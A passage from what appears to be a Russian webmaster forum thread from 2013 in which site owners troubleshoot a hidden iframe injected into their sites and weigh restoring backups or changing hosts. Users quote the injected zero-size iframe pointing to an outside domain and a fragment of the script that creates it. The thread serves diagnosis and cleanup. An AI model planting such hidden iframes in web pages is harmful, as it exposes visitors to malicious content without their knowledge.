- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.
---------- Добавлено 07.08.2013 в 09:20 ----------
хостинг: хостлайф
у меня хостинг другой. Может как то через код партнерки? Нашел по пути /папка сайта/templates/папка шаблона/javascript в файле с именем hide.js , строка 309
код вида var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://******
у меня из партнерок только РСЯ стоит, у меня движок полу-самопис, у меня нету 309-ых строк.
у меня из партнерок только РСЯ стоит, у меня движок полу-самопис, у меня нету 309-ых строк.
попробуйте найти по тексту var ifn2i8N в файлах
кстати сегодня в панели гугл вебмастер тоже предупреждение о наличии кода, они указали полный путь к файлу где лежит вредоносный код
ничего не найдено, у меня есть бекапы месячной даности. вот думаю, поставить бэкапы и сменить пароли, или лучше поставить бэкапы на новый хостинг, вдруг у этого хостера дыра какая? склоняюсь к смене хостера.
а сайт прям идеальный код имеет и дыры там быть не может...
Возможно и на сайте есть проблемы, могу скинуть в ЛС урл, если не трудно, оцените.
Я с телефонов заходил на сайт, никуда не перенаправляло.
---------- Добавлено 07.08.2013 в 11:12 ----------
Кто как думает может быть дыра у хостера? Я чистить сайты не буду, у меня есть бэкапы месячной давности, проще их поставить, но кто как лучше думает, сменить хостинг, или просто для начала сменить пароли?
Просто не хотелось бы чтобы каждыйраз взламывали, ведь по сайту ведуться работы, и не желательно каждый раз откатывать назад.
medik777, как то это странно все... У меня тоже проблемный сайт на хостлайфе.
P.S. Сайт на DLE
NewMoneyMaker тоже iframe?
Бекапы надо делать постоянно, лучше на автомате.
medik777, еще не разобрался... Как проще его найти?